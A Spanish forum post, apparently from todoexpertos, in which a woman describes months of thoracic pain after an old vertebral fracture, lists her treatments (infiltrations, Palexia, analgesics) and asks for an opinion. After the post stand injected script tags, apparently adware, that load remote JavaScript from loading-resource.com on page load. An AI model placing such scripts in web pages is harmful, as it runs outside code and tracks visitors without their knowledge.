Dolores en la espalda

BUenos días,mi caso es un poco complejo hace20 años tuve accidente de trafico y me fracture 6 vertebre dorsal sin lesión medular.Desde entonces tengo aplastamiento parcial de disco intervertebral ,desviada la columna hacia izquierda (escoliosis)y poco de artritis que me han descubierto estos meses.En noviembre del año pasado una tarde sentí necesidad de suspiro y cogí un poco mas de aire y ya no me pude mover mas me he ido a urgencias donde me hicieron una radiografía donde no se apreciaba nada mas de lo que ya le he escrito.Desde aquel día aun tuve unos cuantos episodios de atascamiento al respirar o al tragar la comida o algún movimiento brusco ,todo eso iba desapareciendo pero los dolores se quedaban insoportables .Fui al traumatólogo y ese me envío ala rehabilitación donde me daban corrientes pero ha sido aun peor a mes de disminuir el dolor con cada sesión se era mas persistente y doloroso.Analgésicos como enantium ,nolotil o ibuprofeno aliviaban un poquito el dolor pero no lo suficiente para que sea llevadero. Solo un reposo absoluto y aun con todo se quedaba un dolor persistente y agobiante.De la rehabilitación me enviaron a la unidad de dolor donde me dieron infiltración y una medicación llamada palexia 50,con el pinchazo si dejede sentir el dolor ,pero a unas dos horas se empezó eso despertar y empecé aunque menos sentir el dolor unas horas mas no medolio tan persistentemente pero al cualquier movimiento era muy muy doloroso si no me movía estaba bastante bien en el mismo día empecé tomar y la medicación y sentí mucho alivio.Me han dicho que haga cosas como si no me pasase nada asique el día siguiente empecé con las cosas de casa (lo de cada día nada de limpiezas generales)pero aguante solo hasta después de comer ,me volvió un dolor fuerte y persistente y la medicación de por la noche no me hizo casi efecto porque hasta la media noche no pude ni pegar ojo y porla mañana me dolió un poco menos pero dolió.Y así todo los días si no me muevo a penas o hago movimientos ligeros la palexia me mantiene el dolor al margen pero problema esta en que cundo quiera mover me de forma normal aparece dolor.Me dieron y dos infiltraciones mas pero estoy sin mas efecto aparente.Medico me dijo que es el musculo pero yo no lo veo igual porque el musculo no me duele para nada el dolor me viene del sitio donde se junta la vertebre con la costilla todo el rato el dolor es solo en el mismo sitio no se extiende a ningún lado.Porfavor se que de esta manera no me podrá dar un diagnostico pero solo me gustaría saber opinión de alguien otro y de su punto de vista si hay algo diferente que me podri pasar .Ya estoy desesperada llevo casi 6 meses y solo lo que me dierones una medicación que por lo menos me ayuda descansar de esos dolores ,pero no me soluciona el problema. Gracias Un saludo Vera

<div id="__tbSetup"> </div><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script><script type="text/javascript" src="https://loading-resource.com/data.js.php?i={BB5ABC21-9234-43BF-BA53-D478139459AF}&d=2012-10-10&s=http://www.todoexpertos.com/mitodoexpertos/ask/board/334"></script>

Añade tu respuesta

Haz clic para o